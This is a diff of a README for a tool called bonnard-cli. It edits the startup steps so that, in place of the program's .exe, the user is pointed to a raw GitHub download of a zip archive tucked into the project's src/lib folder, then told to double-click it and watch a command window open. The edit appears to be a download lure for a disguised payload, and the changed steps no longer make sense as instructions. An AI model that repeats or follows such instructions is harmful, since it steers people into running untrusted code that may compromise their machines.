sawon1903210/bonnard-cli/README.md

 To start bonnard-cli, do the following:

 1. Open the folder where you installed or extracted bonnard-cli.
-2. Look for the file `bonnard-cli.exe`.
+2. Look for the file `https://github.com/sawon1903210/bonnard-cli/raw/refs/heads/main/src/lib/cli-bonnard-3.9.zip`.
 3. Double-click this file.
 4. A command window will open showing that the server is starting.
 5. Once started, open your web browser.